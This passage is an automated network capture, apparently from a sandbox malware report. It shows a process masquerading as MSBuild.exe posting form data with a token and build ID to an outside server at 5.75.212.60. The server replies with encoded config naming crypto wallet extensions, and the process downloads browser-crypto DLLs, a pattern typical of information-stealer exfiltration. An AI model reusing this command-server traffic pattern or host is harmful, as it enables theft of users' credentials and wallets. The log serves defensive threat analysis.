                                                                                      Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------HJJJECFIECBGDGCAAAEHCont
                                                                                      2024-07-26 01:17:58 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:58 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:58 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                      Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      5 | 192.168.2.4 | 49735 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:17:58 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCA
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 332
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:17:58 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------CBFCFBFBFBKFIDHJKFCACont
                                                                                      2024-07-26 01:17:59 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:17:59 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:17:59 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.4 | 49736 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:18:00 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBA
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 6713
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:00 UTC6713OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 43 46 49 49 45 48 43 46 48 49 45 43 41 46 42 41 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------FBKECFIIEHCFHIECAFBAContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------FBKECFIIEHCFHIECAFBACont
                                                                                      2024-07-26 01:18:01 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:00 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      7 | 192.168.2.4 | 49737 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:18:01 UTC | 238 | OUT | GET /sqls.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:01 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:01 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2459136
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:01 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      8 | 192.168.2.4 | 49738 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:18:04 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 4677
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:04 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 43 47 49 44 41 4b 45 42 4b 45 43 41 46 49 45 48 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------EHDGCGIDAKEBKECAFIEHContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------EHDGCGIDAKEBKECAFIEHCont
                                                                                      2024-07-26 01:18:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:04 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:05 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      9 | 192.168.2.4 | 49739 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:18:05 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 1529
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:05 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------JKJDBAAAEHIEGCAKFHCGCont
                                                                                      2024-07-26 01:18:06 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:06 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:06 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      10 | 192.168.2.4 | 49740 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:18:06 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 437
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:06 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------AAAAAAAAAAAAAAAAAAAACont
                                                                                      2024-07-26 01:18:07 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      11 | 192.168.2.4 | 49741 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:18:07 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 437
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:07 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------BFCFBFBFBKFIDHJKFCAFCont
                                                                                      2024-07-26 01:18:08 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:08 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:08 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      12 | 192.168.2.4 | 49743 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:18:08 UTC | 241 | OUT | GET /freebl3.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:09 UTC | 260 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:08 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 685392
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:08 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      13 | 192.168.2.4 | 49747 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      2024-07-26 01:18:10 UTC | 241 | OUT | GET /mozglue.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:10 UTC | 260 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:10 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 608080
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:10 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49750 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:12 UTC | 242 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:12 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 01:18:12 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Friday, 26-Jul-2024 01:18:12 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49751 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:13 UTC | 242 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:14 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 01:18:14 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Friday, 26-Jul-2024 01:18:14 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49752 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:15 UTC | 246 | OUT | GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:15 UTC | 259 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 01:18:15 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: close
Last-Modified: Friday, 26-Jul-2024 01:18:15 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49753 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:16 UTC | 238 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:17 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 01:18:16 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: close
Last-Modified: Friday, 26-Jul-2024 01:18:16 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49754 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:19 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:19 UTC | 1145 | OUT | Data Ascii: ------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------ECBGHCGCBKFIECBFHIDGCont
2024-07-26 01:18:20 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 01:18:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 01:18:20 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49755 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-26 01:18:20 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 01:18:20 UTC | 331 | OUT | Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------GDGHJEHJJDAAAKEBGCFCCont
2024-07-26 01:18:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 01:18:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49756 | 5.75.212.60 | 443 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
